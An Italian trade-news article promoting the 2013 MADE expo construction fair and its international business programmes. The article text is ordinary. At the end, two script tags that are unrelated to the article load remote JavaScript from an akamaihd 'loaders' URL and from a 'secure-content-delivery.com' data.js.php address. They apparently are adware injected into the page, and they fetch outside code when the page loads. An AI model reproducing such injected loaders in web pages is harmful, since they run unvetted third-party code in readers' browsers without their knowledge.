1. Home
  2. Notizie e Mercato
  3. A Made expo l’internazionalizzazione traina il mondo delle costruzioni

A Made expo l’internazionalizzazione traina il mondo delle costruzioni

Energie rinnovabili di
L’internazionalizzazione, da sempre il vero cardine di MADE expo, si rinnova approfondendo la propria vocazione e il proprio sguardo verso i mercati esteri


MADE expo, la manifestazione dedicata al mondo delle costruzioni, presenta per il 2013 un’edizione ricca di novità, sulla scia di un importante cambiamento che ha coinvolto la fiera, a cominciare dall’internazionalizzazione, da sempre il vero cardine di MADE expo, che si rinnova approfondendo la propria vocazione e il proprio sguardo verso i mercati esteri.

Un appuntamento dedicato a tutte le aziende del settore che vogliano esplorare e approfittare di importanti momenti di reale business internazionale e di un prodotto fieristico completo, riconosciuto come momento di massima rappresentazione delle innovazioni nel settore delle costruzioni. MADE expo realizza un grande progetto di relazione e incontri internazionali per favorire l’export e la penetrazione delle aziende sui mercati strategici: a questo fine è stato costituito un Comitato per l’Internazionalizzazione delle aziende espositrici di MADE expo, presieduto da Silvio Santambrogio, che da quest’anno ha permesso l’avvio di contatti con i più grandi developers internazionali anche per invitarli alla manifestazione milanese, in un contesto di forte propensione al business, contatti di cui le aziende espositrici a MADE expo avranno la possibilità di beneficiare direttamente.

Rinnovato per il 2013 l’appuntamento con l’International Business Lounge, la piattaforma B2b creata per stabilire un contatto diretto tra le delegazioni ufficiali, gli operatori esteri, i grandi studi e le aziende espositrici, attraverso incontri diretti, finalizzati ad ampliare la rete d’affari. L’International Business Lounge è uno spazio dedicato a concrete relazioni di business e si configura come occasione unica per inserirsi completamente nei mercati internazionali in cui sarà presente una press hub, come punto di raccolta delle testate internazionali all’IBL. MADE expo, infatti, ritrova nei mercati esteri e nello sviluppo di importanti collaborazioni commerciali una delle soluzioni per sostenere il comparto delle costruzioni.

L’attività di promozione internazionale continua con i Road Show: sono 27 le iniziative di promozione organizzate in 18 paesi con l’obiettivo di far conoscere le novità dell’edizione 2013 di MADE expo e di invitare alla manifestazione general contractor, architetti, imprese di costruzione, istituzioni pubbliche, imprese produttrici di materiali. Lo slancio internazionale di MADE expo arriva in Africa, Mediterraneo, Medio Oriente, Far East, India, Cina, Russia, Nord America, Europa, dove i Road Show rappresentano preziose occasioni in cui la manifestazione si presenta a gruppi qualificati di operatori, conducendo, così, la fiera nei principali mercati di interesse per gli stakeholder del settore.


<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script><script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script>